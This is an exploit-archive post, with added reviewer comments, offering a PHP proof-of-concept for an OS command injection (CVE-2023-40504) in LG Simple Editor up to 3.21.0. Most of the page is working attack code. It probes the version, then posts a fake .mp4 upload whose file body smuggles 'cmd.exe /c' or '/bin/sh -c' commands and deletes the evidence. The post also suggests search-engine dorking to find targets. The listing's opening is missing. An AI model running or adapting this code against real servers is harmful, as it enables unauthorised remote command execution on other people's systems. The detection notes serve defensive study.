=============================================================================================================================================
| # Title : LG Simple Editor 3.21.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.lg.com/ |
=============================================================================================================================================

POC :

[+] Dorking In Google Or Other Search Engine.
[+] Code Description: LG Simple Editor Remote Command Injection Exploit Supports both Windows and Linux systems.
    ( https://packetstorm.news/files/id/180171/ CVE-2023-40504)
[+] save code as poc.php.
[+] Set Target : line 87
[+] Usage : php poc.php
[+] PayLoad :

// NOTE(review): the listing is truncated at this point. The opening PHP tag, the
// class declaration, the property declarations and the start of the constructor
// are missing from the page, so the code below is not a complete file. The class
// name LGSimpleEditorExploit is only known from the usage lines at the end.
//
// NOTE(review): the title calls this a "PHP Code Injection", but the description
// above and the request built in executeCommand() describe an OS command injection
// against the editor's video-upload endpoint. PHP is only the language the PoC is
// written in.
//
// Defensive summary, from what the code shows:
//   - Version probe : GET  /simpleeditor/common/commonReleaseNotes.do
//   - Injection path: POST /simpleeditor/imageManager/uploadVideo.do
//                     (multipart field "uploadVideo", file name ending in ".mp4")
//   - The PoC's own check treats every release up to and including 3.21.0 as
//     affected. Confirm the fixed release against the vendor advisory for
//     CVE-2023-40504; this page does not state one.
//   - No credentials, cookies or tokens are sent by any request in this listing.
//     Until the service is updated it should therefore not be reachable from
//     untrusted networks.

        // Tail of the constructor: strips trailing slashes from the base URL and stores the port.
        target = rtrim($target, '/');
        $this->port = $port;
    }

    /**
     * Reads the release-notes page and classifies the service by its version string.
     *
     * The check is banner-based only: it takes the first "v" followed by digits and
     * dots anywhere in the response body and compares it with 3.21.0. Nothing is
     * uploaded or executed here, so the same request can be used for asset inventory.
     * Because the pattern is unanchored, any earlier "v<number>" text on the page
     * would be read as the product version.
     *
     * @return string "Vulnerable (Version: x)", "Safe", "Unknown", or an "Unknown - ..."
     *                message when the request returned nothing.
     */
    public function checkVulnerability()
    {
        $url = "$this->target:$this->port/simpleeditor/common/commonReleaseNotes.do";
        $response = $this->sendRequest('GET', $url);
        // curl_exec() yields false on failure; an empty body is treated the same way.
        if (!$response) {
            return "Unknown - Could not connect to web service - no response";
        }
        preg_match('/v([0-9.]+)/', $response, $matches);
        $version = isset($matches[1]) ? $matches[1] : 'Unknown';
        if ($version === 'Unknown') {
            return "Unknown";
        }
        // Every release up to and including 3.21.0 is reported as vulnerable.
        return version_compare($version, '3.21.0', '<=') ? "Vulnerable (Version: $version)" : "Safe";
    }

    /**
     * Public entry point: prints progress messages around executeCommand().
     *
     * The closing message is printed unconditionally. It does not confirm that
     * anything ran on the remote host.
     *
     * @param string $command Command text passed through unchanged to executeCommand().
     */
    public function exploit($command)
    {
        echo "Sending command injection...\n";
        $this->executeCommand($command);
        echo "Exploit finished, check thy shell.\n";
    }

    /**
     * Builds a multipart/form-data body by hand and POSTs it to the uploadVideo endpoint.
     *
     * Detection notes for defenders, based on the request assembled below:
     *   - the "uploadVideo" part claims a ".mp4" file name of one to six lowercase letters;
     *   - the part body is not video data; it is a short text string containing "&"
     *     separators, "cmd.exe /c" or "/bin/sh -c", several "cd .." steps and a "del"
     *     of the same file name;
     *   - the boundary is "----WebKitFormBoundary" followed by 32 hex characters
     *     (an MD5 of the current time), not the usual browser-generated suffix.
     * Web or proxy logs with POSTs to /simpleeditor/imageManager/uploadVideo.do from
     * unexpected sources, and child processes spawned by the editor's application
     * server, are the places to look. The second is an inference; confirm it on a
     * test install.
     *
     * @param string $command Command text embedded in the upload body.
     */
    private function executeCommand($command)
    {
        // Random file name; rand() is not a cryptographic source, it is used only for variety.
        $filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(1, 6));
        $boundary = "----WebKitFormBoundary" . md5(time());
        // The command wrapper is selected from the PHP_OS constant.
        $payload = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? "cmd.exe /c $command" : "/bin/sh -c '$command'";
        $postData = "--$boundary\r\n";
        $postData .= "Content-Disposition: form-data; name=\"uploadVideo\"; filename=\"$filename.mp4\"\r\n";
        $postData .= "Content-Type: application/octet-stream\r\n\r\n";
        // Part body: the wrapped command followed by directory changes and removal of the uploaded file.
        $postData .= "/\"&#$payload&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del $filename.mp4&/../\r\n";
        $postData .= "--$boundary--\r\n";
        $url = "$this->target:$this->port/simpleeditor/imageManager/uploadVideo.do";
        $response = $this->sendRequest('POST', $url, $postData, $boundary);
        // A non-empty HTTP body is the only success criterion; the status code is never checked.
        if ($response) {
            echo "Command injection sent.\n";
        } else {
            die("Unexpected response received.\n");
        }
    }

    /**
     * Thin cURL wrapper used by both requests.
     *
     * No timeout, redirect or TLS options are set, so cURL defaults apply.
     *
     * @param string      $method   HTTP verb, set through CURLOPT_CUSTOMREQUEST.
     * @param string      $url      Full request URL.
     * @param string|null $data     Raw request body; when truthy the request is sent as a multipart POST.
     * @param string|null $boundary Multipart boundary placed in the Content-Type header.
     *
     * @return string|false Response body, or false when curl_exec() fails.
     */
    private function sendRequest($method, $url, $data = null, $boundary = null)
    {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($data) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch, CURLOPT_HTTPHEADER, [
                "Content-Type: multipart/form-data; boundary=$boundary"
            ]);
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
}

// Example usage:
// NOTE(review): only the base URL is passed here, so the constructor presumably
// supplies a default port. That default is in the part of the listing that is
// missing from the page.
$exploit = new LGSimpleEditorExploit('http://target-ip');
echo $exploit->checkVulnerability() . "\n";
$exploit->exploit('whoami');

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================